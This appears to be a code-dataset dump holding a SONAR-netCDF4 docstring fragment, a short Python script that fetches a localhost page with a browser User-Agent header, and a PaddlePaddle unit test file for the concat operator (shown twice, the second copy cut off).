This allows the array to be writable downstream (i.e. we can assign values to certain indices). To retain the attributes and encoding of ``ping_time`` it is necessary to use .assign_coords() with ``ping_time`` from ds. # variables to add ping_time to Manipulates variables in ``Sonar/Beam_groupX`` to adhere to SONAR-netCDF4 vers. 1 with respect to the use of ``ping_time`` and ``beam`` dimensions. This does several things: 1. Creates ``beam`` dimension and coordinate variable when not present. 2. Adds ``beam`` dimension to several variables when missing. 3. Adds ``ping_time`` dimension to several variables when missing. Parameters ---------- ds : xr.Dataset Dataset corresponding to ``Beam_groupX``. beam_only_names : Set[str] Variables that need only the beam dimension added to them. beam_ping_time_names : Set[str] Variables that need beam and ping_time dimensions added to them. ping_time_only_names : Set[str] Variables that need only the ping_time dimension added to them.
| 2.371644
| 2
|
nsd1803/python/day12/get_web2.py
|
MrWangwf/nsd1806
| 0
|
6627565
|
<reponame>MrWangwf/nsd1806
'为了防止由于服务器限制,不能通过程序爬取页面,模拟使用Firefox浏览'
from urllib import request
url = 'http://127.0.0.1/'
header = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
r = request.Request(url, headers=header)
html = request.urlopen(r)
data = html.read()
print(data.decode('utf8'))
# tail -f /var/log/httpd/access_log
|
'为了防止由于服务器限制,不能通过程序爬取页面,模拟使用Firefox浏览'
from urllib import request
url = 'http://127.0.0.1/'
header = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
r = request.Request(url, headers=header)
html = request.urlopen(r)
data = html.read()
print(data.decode('utf8'))
# tail -f /var/log/httpd/access_log
|
en
| 0.587914
|
# tail -f /var/log/httpd/access_log
| 2.564031
| 3
|
python/paddle/fluid/tests/unittests/test_concat_op.py
|
L-Net-1992/Paddle
| 11
|
6627566
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest, skip_check_grad_ci, convert_float_to_uint16
import paddle.fluid as fluid
from paddle.fluid import compiler, Program, program_guard, core
from paddle.fluid.framework import _test_eager_guard
import paddle
class TestConcatOp(OpTest):
def setUp(self):
self.op_type = "concat"
self.python_api = paddle.concat
self.dtype = self.get_dtype()
self.init_test_data()
self.inputs = {'X': [('x0', self.x0), ('x1', self.x1), ('x2', self.x2)]}
self.attrs = {'axis': self.axis}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
self.outputs = {
'Out':
np.concatenate((self.x0, self.x1, self.x2), axis=self.actual_axis)
}
def get_dtype(self):
return "float64"
def test_check_output(self):
if self.dtype == np.uint16:
place = core.CUDAPlace(0)
self.check_output_with_place(place)
else:
self.check_output(check_eager=True)
def test_check_grad(self):
if self.dtype == np.uint16:
place = core.CUDAPlace(0)
self.check_grad_with_place(place, ['x0'], 'Out')
self.check_grad_with_place(place, ['x1'], 'Out')
self.check_grad_with_place(place, ['x2'], 'Out')
else:
self.check_grad(['x0'], 'Out', check_eager=True)
self.check_grad(['x1'], 'Out', check_eager=True)
self.check_grad(['x2'], 'Out', check_eager=True)
def init_test_data(self):
if self.dtype == np.uint16:
x0 = np.random.random((5, 1, 4, 5)).astype(np.float32)
self.x0 = convert_float_to_uint16(x0)
x1 = np.random.random((5, 2, 4, 5)).astype(np.float32)
self.x1 = convert_float_to_uint16(x1)
x2 = np.random.random((5, 3, 4, 5)).astype(np.float32)
self.x2 = convert_float_to_uint16(x2)
else:
self.x0 = np.random.random((5, 1, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((5, 2, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((5, 3, 4, 5)).astype(self.dtype)
self.axis = 1
class TestConcatOp2(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.axis = 1
@skip_check_grad_ci(
reason="The function 'check_grad' for large inputs is too slow.")
class TestConcatOp3(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((1, 256, 170, 256)).astype(self.dtype)
self.x1 = np.random.random((1, 128, 170, 256)).astype(self.dtype)
self.x2 = np.random.random((1, 128, 170, 256)).astype(self.dtype)
self.axis = 1
def test_check_grad(self):
pass
@skip_check_grad_ci(
reason=
"This test will meet fetch error when there is a null grad. The detailed information is in PR#17015."
)
class TestConcatOp4(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((0, 3, 4, 5)).astype(self.dtype)
self.axis = 0
def test_check_grad(self):
pass
class TestConcatOp5(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((5, 1, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((5, 2, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((5, 3, 4, 5)).astype(self.dtype)
self.axis = -3
class TestConcatOp6(TestConcatOp):
def setUp(self):
self.op_type = "concat"
self.dtype = self.get_dtype()
self.python_api = paddle.concat
self.init_test_data()
self.lod = [[20, 80]]
self.out_lod = [[20, 80, 20, 80, 20, 80]]
self.inputs = {
'X': [('x0', (self.x0, self.lod)), ('x1', (self.x1, self.lod)),
('x2', (self.x2, self.lod))]
}
self.attrs = {'axis': self.axis}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
out = np.concatenate((self.x0, self.x1, self.x2), axis=self.actual_axis)
self.outputs = {'Out': (out, self.out_lod)}
def test_check_output(self):
self.check_output(check_eager=True)
def test_check_grad(self):
self.check_grad(['x0'], 'Out', check_eager=True)
self.check_grad(['x1'], 'Out', check_eager=True)
self.check_grad(['x2'], 'Out', check_eager=True)
def init_test_data(self):
self.x0 = np.random.random([100]).astype(self.dtype)
self.x1 = np.random.random([100]).astype(self.dtype)
self.x2 = np.random.random([100]).astype(self.dtype)
self.axis = 0
def create_test_AxisTensor(parent):
class TestConcatAxisTensor(parent):
def setUp(self):
self.op_type = "concat"
self.python_api = paddle.concat
self.dtype = self.get_dtype()
self.init_test_data()
self.inputs = {
'X': [('x0', self.x0), ('x1', self.x1), ('x2', self.x2)],
'AxisTensor': np.array([self.axis]).astype("int32")
}
self.attrs = {}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
self.outputs = {
'Out':
np.concatenate((self.x0, self.x1, self.x2),
axis=self.actual_axis)
}
cls_name = "{0}_{1}".format(parent.__name__, "AxisTensor")
TestConcatAxisTensor.__name__ = cls_name
globals()[cls_name] = TestConcatAxisTensor
create_test_AxisTensor(TestConcatOp)
create_test_AxisTensor(TestConcatOp2)
create_test_AxisTensor(TestConcatOp3)
create_test_AxisTensor(TestConcatOp4)
create_test_AxisTensor(TestConcatOp5)
create_test_AxisTensor(TestConcatOp6)
#----------------Concat Fp16----------------
def create_test_fp16(parent):
class TestConcatFp16(parent):
def get_dtype(self):
return np.float16
cls_name = "{0}_{1}".format(parent.__name__, "Fp16")
TestConcatFp16.__name__ = cls_name
globals()[cls_name] = TestConcatFp16
create_test_fp16(TestConcatOp)
create_test_fp16(TestConcatOp2)
create_test_fp16(TestConcatOp3)
create_test_fp16(TestConcatOp4)
create_test_fp16(TestConcatOp5)
create_test_fp16(TestConcatOp6)
#----------------Concat Bf16----------------
def create_test_bf16(parent):
@unittest.skipIf(not paddle.is_compiled_with_cuda(),
"core is not compiled with CUDA")
class TestConcatBf16(parent):
def get_dtype(self):
return np.uint16
cls_name = "{0}_{1}".format(parent.__name__, "Bf16")
TestConcatBf16.__name__ = cls_name
globals()[cls_name] = TestConcatBf16
create_test_bf16(TestConcatOp)
class TestConcatOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of concat_op should be list.
x1 = fluid.layers.data(shape=[4], dtype='int32', name='x1')
fluid.layers.concat(x1)
# The item in input must be Variable.
x2 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
x3 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
self.assertRaises(TypeError, fluid.layers.concat, [x2])
# The input dtype of concat_op must be float16, float32, float64, int32, int64.
x4 = fluid.layers.data(shape=[4], dtype='uint8', name='x4')
x5 = fluid.layers.data(shape=[4], dtype='uint8', name='x5')
self.assertRaises(TypeError, fluid.layers.concat, [x4, x5])
x6 = fluid.layers.data(shape=[4], dtype='float16', name='x6')
x7 = fluid.layers.data(shape=[4], dtype='float16', name='x7')
x8 = fluid.layers.data(shape=[4], dtype='float32', name='x8')
fluid.layers.concat([x6, x7])
# The type of axis in concat_op should be int or Variable.
def test_axis_type():
fluid.layers.concat([x6, x7], 3.2)
self.assertRaises(TypeError, test_axis_type)
def test_input_same_dtype():
fluid.layers.concat([x7, x8])
self.assertRaises(TypeError, test_input_same_dtype)
class TestConcatAPI(unittest.TestCase):
def test_fluid_api(self):
paddle.enable_static()
x_1 = fluid.data(shape=[None, 1, 4, 5], dtype='int32', name='x_1')
fluid.layers.concat([x_1, x_1], 0)
input_2 = np.random.random([2, 1, 4, 5]).astype("int32")
input_3 = np.random.random([2, 2, 4, 5]).astype("int32")
x_2 = fluid.data(shape=[2, 1, 4, 5], dtype='int32', name='x_2')
x_3 = fluid.data(shape=[2, 2, 4, 5], dtype='int32', name='x_3')
positive_1_int32 = fluid.layers.fill_constant([1], "int32", 1)
positive_1_int64 = fluid.layers.fill_constant([1], "int64", 1)
out_1 = fluid.layers.concat(input=[x_2, x_3], axis=1)
out_2 = fluid.layers.concat(input=[x_2, x_3], axis=positive_1_int32)
out_3 = fluid.layers.concat(input=[x_2, x_3], axis=positive_1_int64)
exe = fluid.Executor(place=fluid.CPUPlace())
[res_1, res_2, res_3] = exe.run(fluid.default_main_program(),
feed={
"x_1": input_2,
"x_2": input_2,
"x_3": input_3
},
fetch_list=[out_1, out_2, out_3])
assert np.array_equal(res_1, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_2, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_3, np.concatenate((input_2, input_3), axis=1))
def test_api(self):
paddle.enable_static()
x_1 = paddle.fluid.data(shape=[None, 1, 4, 5],
dtype='int32',
name='x_1')
paddle.concat([x_1, x_1], 0)
input_2 = np.random.random([2, 1, 4, 5]).astype("int32")
input_3 = np.random.random([2, 2, 4, 5]).astype("int32")
x_2 = fluid.data(shape=[2, 1, 4, 5], dtype='int32', name='x_2')
x_3 = fluid.data(shape=[2, 2, 4, 5], dtype='int32', name='x_3')
positive_1_int32 = paddle.fluid.layers.fill_constant([1], "int32", 1)
positive_1_int64 = paddle.fluid.layers.fill_constant([1], "int64", 1)
negative_int64 = paddle.fluid.layers.fill_constant([1], "int64", -3)
out_1 = paddle.concat(x=[x_2, x_3], axis=1)
out_2 = paddle.concat(x=[x_2, x_3], axis=positive_1_int32)
out_3 = paddle.concat(x=[x_2, x_3], axis=positive_1_int64)
out_4 = paddle.concat(x=[x_2, x_3], axis=negative_int64)
exe = paddle.static.Executor(place=paddle.CPUPlace())
[res_1, res_2, res_3,
res_4] = exe.run(paddle.static.default_main_program(),
feed={
"x_1": input_2,
"x_2": input_2,
"x_3": input_3
},
fetch_list=[out_1, out_2, out_3, out_4])
assert np.array_equal(res_1, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_2, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_3, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_4, np.concatenate((input_2, input_3), axis=1))
def test_imperative(self):
in1 = np.array([[1, 2, 3], [4, 5, 6]])
in2 = np.array([[11, 12, 13], [14, 15, 16]])
in3 = np.array([[21, 22], [23, 24]])
paddle.disable_static()
x1 = paddle.to_tensor(in1)
x2 = paddle.to_tensor(in2)
x3 = paddle.to_tensor(in3)
out1 = fluid.layers.concat(input=[x1, x2, x3], axis=-1)
out2 = paddle.concat(x=[x1, x2], axis=0)
np_out1 = np.concatenate([in1, in2, in3], axis=-1)
np_out2 = np.concatenate([in1, in2], axis=0)
paddle.enable_static()
self.assertEqual((out1.numpy() == np_out1).all(), True)
self.assertEqual((out2.numpy() == np_out2).all(), True)
def test_eager(self):
with _test_eager_guard():
self.test_api()
self.test_fluid_api()
self.test_imperative()
    def test_errors(self):
        """Invalid items, dtypes and axis types passed to concat must raise TypeError."""
        with program_guard(Program(), Program()):
            # The item in input must be Variable.
            x2 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
                                         fluid.CPUPlace())
            x3 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
                                         fluid.CPUPlace())
            self.assertRaises(TypeError, paddle.concat, [x2])
            # The input dtype of concat_op must be float16, float32, float64, int32, int64.
            x4 = paddle.fluid.data(shape=[4], dtype='uint8', name='x4')
            x5 = paddle.fluid.data(shape=[4], dtype='uint8', name='x5')
            self.assertRaises(TypeError, fluid.layers.concat, [x4, x5])
            # The type of axis in concat_op should be int or Variable.
            x6 = fluid.layers.data(shape=[4], dtype='float16', name='x6')
            x7 = fluid.layers.data(shape=[4], dtype='float16', name='x7')
            x8 = fluid.layers.data(shape=[4], dtype='float32', name='x8')

            def test_axis_type():
                paddle.concat([x6, x7], 3.2)

            self.assertRaises(TypeError, test_axis_type)

            def test_input_same_dtype():
                # Mixed float16/float32 inputs are rejected.
                paddle.concat([x7, x8])

            self.assertRaises(TypeError, test_input_same_dtype)
class TestConcatAPIWithLoDTensorArray(unittest.TestCase):
    """
    Test concat api when the input(x) is a LoDTensorArray.
    """

    def setUp(self):
        # Concatenate self.iter_num copies of self.x along self.axis.
        self.axis = 1
        self.python = paddle.concat
        self.iter_num = 3
        self.input_shape = [2, 3]
        self.x = np.random.random(self.input_shape).astype("float32")
        self.place = fluid.CUDAPlace(0) \
            if fluid.is_compiled_with_cuda() else fluid.CPUPlace()

    def set_program(self, use_fluid_api):
        """Build a static program that writes self.x into a tensor array
        self.iter_num times and concatenates the array along self.axis."""
        paddle.enable_static()
        if use_fluid_api:
            self.program = fluid.Program()
            with fluid.program_guard(self.program):
                input = fluid.layers.assign(self.x)
                tensor_array = fluid.layers.create_array(dtype='float32')
                zero = fluid.layers.fill_constant(shape=[1],
                                                  value=0,
                                                  dtype="int64")
                for i in range(self.iter_num):
                    fluid.layers.array_write(input, zero + i, tensor_array)
                self.out_var = fluid.layers.concat(tensor_array, axis=self.axis)
        else:
            self.program = paddle.static.Program()
            with paddle.static.program_guard(self.program):
                input = paddle.assign(self.x)
                tensor_array = fluid.layers.create_array(
                    dtype='float32'
                )  # Api create_array is not supported in paddle 2.0 yet.
                zero = paddle.zeros(shape=[1], dtype="int64")
                for i in range(self.iter_num):
                    # Api array_write is not supported in paddle 2.0 yet.
                    fluid.layers.array_write(input, zero + i, tensor_array)
                self.out_var = paddle.concat(tensor_array, axis=self.axis)

    def test_fluid_api(self):
        self._run_static_mode(use_fluid_api=True)

    def test_paddle_api(self):
        self._run_static_mode(use_fluid_api=False)

    def _run_static_mode(self, use_fluid_api):
        self.set_program(use_fluid_api)
        # Concat over a tensor array has an unknown (-1) extent on the axis.
        self.assertTrue(self.out_var.shape[self.axis] == -1)
        exe = fluid.Executor(self.place)
        res = exe.run(self.program, fetch_list=self.out_var)
        self.assertTrue(
            np.array_equal(
                res[0], np.concatenate([self.x] * self.iter_num,
                                       axis=self.axis)))


if __name__ == '__main__':
    unittest.main()
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest, skip_check_grad_ci, convert_float_to_uint16
import paddle.fluid as fluid
from paddle.fluid import compiler, Program, program_guard, core
from paddle.fluid.framework import _test_eager_guard
import paddle
class TestConcatOp(OpTest):
    """Base OpTest for the concat operator: three inputs joined on one axis.

    Subclasses customize init_test_data() (shapes/axis) and get_dtype().
    """

    def setUp(self):
        self.op_type = "concat"
        self.python_api = paddle.concat
        self.dtype = self.get_dtype()
        self.init_test_data()
        self.inputs = {'X': [('x0', self.x0), ('x1', self.x1), ('x2', self.x2)]}
        self.attrs = {'axis': self.axis}
        if self.axis < 0:
            # Normalize a negative axis; clamp to 0 to mirror the op's handling.
            self.actual_axis = self.axis + len(self.x0.shape)
            self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
        else:
            self.actual_axis = self.axis
        self.outputs = {
            'Out':
            np.concatenate((self.x0, self.x1, self.x2), axis=self.actual_axis)
        }

    def get_dtype(self):
        # Overridden by the fp16/bf16 factory-generated subclasses.
        return "float64"

    def test_check_output(self):
        if self.dtype == np.uint16:
            # uint16 is the storage dtype for bfloat16; bf16 runs on CUDA only.
            place = core.CUDAPlace(0)
            self.check_output_with_place(place)
        else:
            self.check_output(check_eager=True)

    def test_check_grad(self):
        if self.dtype == np.uint16:
            place = core.CUDAPlace(0)
            self.check_grad_with_place(place, ['x0'], 'Out')
            self.check_grad_with_place(place, ['x1'], 'Out')
            self.check_grad_with_place(place, ['x2'], 'Out')
        else:
            self.check_grad(['x0'], 'Out', check_eager=True)
            self.check_grad(['x1'], 'Out', check_eager=True)
            self.check_grad(['x2'], 'Out', check_eager=True)

    def init_test_data(self):
        if self.dtype == np.uint16:
            # bfloat16 data is generated in float32 and then packed to uint16.
            x0 = np.random.random((5, 1, 4, 5)).astype(np.float32)
            self.x0 = convert_float_to_uint16(x0)
            x1 = np.random.random((5, 2, 4, 5)).astype(np.float32)
            self.x1 = convert_float_to_uint16(x1)
            x2 = np.random.random((5, 3, 4, 5)).astype(np.float32)
            self.x2 = convert_float_to_uint16(x2)
        else:
            self.x0 = np.random.random((5, 1, 4, 5)).astype(self.dtype)
            self.x1 = np.random.random((5, 2, 4, 5)).astype(self.dtype)
            self.x2 = np.random.random((5, 3, 4, 5)).astype(self.dtype)
        self.axis = 1
class TestConcatOp2(TestConcatOp):
    """Concat test where all three inputs share the same (2, 3, 4, 5) shape."""

    def init_test_data(self):
        shape = (2, 3, 4, 5)
        # Three independent random draws, consumed in the same order as before.
        self.x0 = np.random.random(shape).astype(self.dtype)
        self.x1 = np.random.random(shape).astype(self.dtype)
        self.x2 = np.random.random(shape).astype(self.dtype)
        self.axis = 1
@skip_check_grad_ci(
    reason="The function 'check_grad' for large inputs is too slow.")
class TestConcatOp3(TestConcatOp):
    """Large-input variant; gradient checking is skipped for speed."""

    def init_test_data(self):
        self.x0 = np.random.random((1, 256, 170, 256)).astype(self.dtype)
        self.x1 = np.random.random((1, 128, 170, 256)).astype(self.dtype)
        self.x2 = np.random.random((1, 128, 170, 256)).astype(self.dtype)
        self.axis = 1

    def test_check_grad(self):
        # Intentionally disabled: see the skip_check_grad_ci reason above.
        pass
@skip_check_grad_ci(
    reason=
    "This test will meet fetch error when there is a null grad. The detailed information is in PR#17015."
)
class TestConcatOp4(TestConcatOp):
    """Variant with a zero-sized input tensor along the concat axis."""

    def init_test_data(self):
        self.x0 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
        self.x1 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
        # x2 is empty along axis 0 and contributes nothing to the output.
        self.x2 = np.random.random((0, 3, 4, 5)).astype(self.dtype)
        self.axis = 0

    def test_check_grad(self):
        # Intentionally disabled: the null gradient triggers a fetch error.
        pass
class TestConcatOp5(TestConcatOp):
    """Same inputs as the base test, but concatenated along negative axis -3."""

    def init_test_data(self):
        # Widths 1/2/3 on the second dimension, matching the base test data.
        self.x0 = np.random.random((5, 1, 4, 5)).astype(self.dtype)
        self.x1 = np.random.random((5, 2, 4, 5)).astype(self.dtype)
        self.x2 = np.random.random((5, 3, 4, 5)).astype(self.dtype)
        # -3 normalizes to axis 1 for these 4-D inputs.
        self.axis = -3
class TestConcatOp6(TestConcatOp):
    """Concat of 1-D LoD tensors; also checks the stitched output LoD."""

    def setUp(self):
        self.op_type = "concat"
        self.dtype = self.get_dtype()
        self.python_api = paddle.concat
        self.init_test_data()
        # Every input carries the same sequence lengths; the output LoD is the
        # per-input LoD repeated once per input.
        self.lod = [[20, 80]]
        self.out_lod = [[20, 80, 20, 80, 20, 80]]
        self.inputs = {
            'X': [('x0', (self.x0, self.lod)), ('x1', (self.x1, self.lod)),
                  ('x2', (self.x2, self.lod))]
        }
        self.attrs = {'axis': self.axis}
        if self.axis < 0:
            # Normalize a negative axis; clamp to 0 to mirror the op's handling.
            self.actual_axis = self.axis + len(self.x0.shape)
            self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
        else:
            self.actual_axis = self.axis
        out = np.concatenate((self.x0, self.x1, self.x2), axis=self.actual_axis)
        self.outputs = {'Out': (out, self.out_lod)}

    def test_check_output(self):
        self.check_output(check_eager=True)

    def test_check_grad(self):
        self.check_grad(['x0'], 'Out', check_eager=True)
        self.check_grad(['x1'], 'Out', check_eager=True)
        self.check_grad(['x2'], 'Out', check_eager=True)

    def init_test_data(self):
        self.x0 = np.random.random([100]).astype(self.dtype)
        self.x1 = np.random.random([100]).astype(self.dtype)
        self.x2 = np.random.random([100]).astype(self.dtype)
        self.axis = 0
def create_test_AxisTensor(parent):
    """Register a variant of *parent* that feeds the axis as the 'AxisTensor'
    input instead of the 'axis' attribute."""

    class TestConcatAxisTensor(parent):

        def setUp(self):
            self.op_type = "concat"
            self.python_api = paddle.concat
            self.dtype = self.get_dtype()
            self.init_test_data()
            self.inputs = {
                'X': [('x0', self.x0), ('x1', self.x1), ('x2', self.x2)],
                'AxisTensor': np.array([self.axis]).astype("int32")
            }
            # No 'axis' attribute: the op must read it from AxisTensor.
            self.attrs = {}
            if self.axis < 0:
                self.actual_axis = self.axis + len(self.x0.shape)
                self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
            else:
                self.actual_axis = self.axis
            self.outputs = {
                'Out':
                np.concatenate((self.x0, self.x1, self.x2),
                               axis=self.actual_axis)
            }

    cls_name = "{0}_{1}".format(parent.__name__, "AxisTensor")
    TestConcatAxisTensor.__name__ = cls_name
    # Publish the generated class at module level so unittest discovers it.
    globals()[cls_name] = TestConcatAxisTensor


create_test_AxisTensor(TestConcatOp)
create_test_AxisTensor(TestConcatOp2)
create_test_AxisTensor(TestConcatOp3)
create_test_AxisTensor(TestConcatOp4)
create_test_AxisTensor(TestConcatOp5)
create_test_AxisTensor(TestConcatOp6)
#----------------Concat Fp16----------------
def create_test_fp16(parent):
    """Derive and register a float16 flavour of *parent*.

    Only get_dtype() is overridden; the generated class is published at
    module level under the name "<Parent>_Fp16" so unittest can discover it.
    """

    class TestConcatFp16(parent):

        def get_dtype(self):
            return np.float16

    cls_name = parent.__name__ + "_Fp16"
    TestConcatFp16.__name__ = cls_name
    globals()[cls_name] = TestConcatFp16
# Register float16 variants of every concat test case above.
create_test_fp16(TestConcatOp)
create_test_fp16(TestConcatOp2)
create_test_fp16(TestConcatOp3)
create_test_fp16(TestConcatOp4)
create_test_fp16(TestConcatOp5)
create_test_fp16(TestConcatOp6)
#----------------Concat Bf16----------------
def create_test_bf16(parent):
    """Derive and register a bfloat16 flavour of *parent*.

    The generated class is skipped entirely when paddle is not built with
    CUDA, because bf16 concat only runs on GPU."""

    @unittest.skipIf(not paddle.is_compiled_with_cuda(),
                     "core is not compiled with CUDA")
    class TestConcatBf16(parent):

        def get_dtype(self):
            # np.uint16 is the storage dtype OpTest uses for bfloat16.
            return np.uint16

    cls_name = "{0}_{1}".format(parent.__name__, "Bf16")
    TestConcatBf16.__name__ = cls_name
    # Publish the generated class at module level so unittest discovers it.
    globals()[cls_name] = TestConcatBf16


create_test_bf16(TestConcatOp)
class TestConcatOpError(unittest.TestCase):
    """Error-path tests for the legacy fluid.layers.concat API."""

    def test_errors(self):
        with program_guard(Program(), Program()):
            # The input type of concat_op should be list.
            x1 = fluid.layers.data(shape=[4], dtype='int32', name='x1')
            fluid.layers.concat(x1)
            # The item in input must be Variable.
            x2 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
                                         fluid.CPUPlace())
            x3 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
                                         fluid.CPUPlace())
            self.assertRaises(TypeError, fluid.layers.concat, [x2])
            # The input dtype of concat_op must be float16, float32, float64, int32, int64.
            x4 = fluid.layers.data(shape=[4], dtype='uint8', name='x4')
            x5 = fluid.layers.data(shape=[4], dtype='uint8', name='x5')
            self.assertRaises(TypeError, fluid.layers.concat, [x4, x5])
            x6 = fluid.layers.data(shape=[4], dtype='float16', name='x6')
            x7 = fluid.layers.data(shape=[4], dtype='float16', name='x7')
            x8 = fluid.layers.data(shape=[4], dtype='float32', name='x8')
            # Same-dtype float16 inputs are accepted without error.
            fluid.layers.concat([x6, x7])

            # The type of axis in concat_op should be int or Variable.
            def test_axis_type():
                fluid.layers.concat([x6, x7], 3.2)

            self.assertRaises(TypeError, test_axis_type)

            def test_input_same_dtype():
                # Mixed float16/float32 inputs are rejected.
                fluid.layers.concat([x7, x8])

            self.assertRaises(TypeError, test_input_same_dtype)
class TestConcatAPI(unittest.TestCase):
    """API-level concat tests covering static graph, dynamic graph and eager mode."""

    def test_fluid_api(self):
        """Static-graph concat via the legacy fluid.layers API."""
        paddle.enable_static()
        x_1 = fluid.data(shape=[None, 1, 4, 5], dtype='int32', name='x_1')
        fluid.layers.concat([x_1, x_1], 0)
        input_2 = np.random.random([2, 1, 4, 5]).astype("int32")
        input_3 = np.random.random([2, 2, 4, 5]).astype("int32")
        x_2 = fluid.data(shape=[2, 1, 4, 5], dtype='int32', name='x_2')
        x_3 = fluid.data(shape=[2, 2, 4, 5], dtype='int32', name='x_3')
        # The axis may be a plain int or an int32/int64 tensor.
        positive_1_int32 = fluid.layers.fill_constant([1], "int32", 1)
        positive_1_int64 = fluid.layers.fill_constant([1], "int64", 1)
        out_1 = fluid.layers.concat(input=[x_2, x_3], axis=1)
        out_2 = fluid.layers.concat(input=[x_2, x_3], axis=positive_1_int32)
        out_3 = fluid.layers.concat(input=[x_2, x_3], axis=positive_1_int64)
        exe = fluid.Executor(place=fluid.CPUPlace())
        [res_1, res_2, res_3] = exe.run(fluid.default_main_program(),
                                        feed={
                                            "x_1": input_2,
                                            "x_2": input_2,
                                            "x_3": input_3
                                        },
                                        fetch_list=[out_1, out_2, out_3])
        assert np.array_equal(res_1, np.concatenate((input_2, input_3), axis=1))
        assert np.array_equal(res_2, np.concatenate((input_2, input_3), axis=1))
        assert np.array_equal(res_3, np.concatenate((input_2, input_3), axis=1))

    def test_api(self):
        """Static-graph concat via the paddle 2.x API, including a negative axis tensor."""
        paddle.enable_static()
        x_1 = paddle.fluid.data(shape=[None, 1, 4, 5],
                                dtype='int32',
                                name='x_1')
        paddle.concat([x_1, x_1], 0)
        input_2 = np.random.random([2, 1, 4, 5]).astype("int32")
        input_3 = np.random.random([2, 2, 4, 5]).astype("int32")
        x_2 = fluid.data(shape=[2, 1, 4, 5], dtype='int32', name='x_2')
        x_3 = fluid.data(shape=[2, 2, 4, 5], dtype='int32', name='x_3')
        positive_1_int32 = paddle.fluid.layers.fill_constant([1], "int32", 1)
        positive_1_int64 = paddle.fluid.layers.fill_constant([1], "int64", 1)
        # axis=-3 normalizes to axis=1 for these 4-D inputs.
        negative_int64 = paddle.fluid.layers.fill_constant([1], "int64", -3)
        out_1 = paddle.concat(x=[x_2, x_3], axis=1)
        out_2 = paddle.concat(x=[x_2, x_3], axis=positive_1_int32)
        out_3 = paddle.concat(x=[x_2, x_3], axis=positive_1_int64)
        out_4 = paddle.concat(x=[x_2, x_3], axis=negative_int64)
        exe = paddle.static.Executor(place=paddle.CPUPlace())
        [res_1, res_2, res_3,
         res_4] = exe.run(paddle.static.default_main_program(),
                          feed={
                              "x_1": input_2,
                              "x_2": input_2,
                              "x_3": input_3
                          },
                          fetch_list=[out_1, out_2, out_3, out_4])
        assert np.array_equal(res_1, np.concatenate((input_2, input_3), axis=1))
        assert np.array_equal(res_2, np.concatenate((input_2, input_3), axis=1))
        assert np.array_equal(res_3, np.concatenate((input_2, input_3), axis=1))
        assert np.array_equal(res_4, np.concatenate((input_2, input_3), axis=1))

    def test_imperative(self):
        """Dynamic-graph concat checked against numpy.concatenate."""
        in1 = np.array([[1, 2, 3], [4, 5, 6]])
        in2 = np.array([[11, 12, 13], [14, 15, 16]])
        in3 = np.array([[21, 22], [23, 24]])
        paddle.disable_static()
        x1 = paddle.to_tensor(in1)
        x2 = paddle.to_tensor(in2)
        x3 = paddle.to_tensor(in3)
        # Exercise both the legacy fluid API and the paddle 2.x API.
        out1 = fluid.layers.concat(input=[x1, x2, x3], axis=-1)
        out2 = paddle.concat(x=[x1, x2], axis=0)
